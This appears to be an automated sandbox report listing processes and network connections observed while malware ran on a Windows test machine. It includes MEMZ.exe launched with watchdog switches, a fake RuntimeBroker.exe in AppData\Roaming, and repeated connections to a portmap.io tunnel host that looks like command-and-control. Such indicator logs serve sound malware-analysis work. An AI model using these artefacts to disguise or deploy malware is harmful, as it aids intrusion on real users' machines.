"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4268 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4408 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4556 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4688 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4540 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4752 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4432 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3272 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3224 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3500 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2084 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2364 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3516 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3516 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2100 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2064 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2692 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2684 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5356 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1644 --field-trial-handle=1884,i,13071793552152944592,910346315089759456,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1968 --field-trial-handle=1884,i,13071793552152944592,910346315089759456,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1484 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3380 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4168 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5152 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5204 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3040 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4740 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5344 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5236 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5544 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5756 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4168 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5040 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5636 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /main
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\SYSTEM32\MsiExec.exe
MsiExec.exe /X{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 77CD4EEA0315166438CDB2DBA3B1B727
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\SYSTEM32\MsiExec.exe
MsiExec.exe /X{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sebeee-39917.portmap.io | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 52.111.227.11:443 | | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | www.easeus.com | udp |
| US | 104.18.7.90:443 | www.easeus.com | tcp |
| US | 104.18.7.90:443 | www.easeus.com | tcp |
| US | 8.8.8.8:53 | 90.7.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | scripts.prdredir.com | udp |
| US | 8.8.8.8:53 | widget.trustpilot.com | udp |
| GB | 89.187.167.4:443 | cdn.consentmanager.net | tcp |
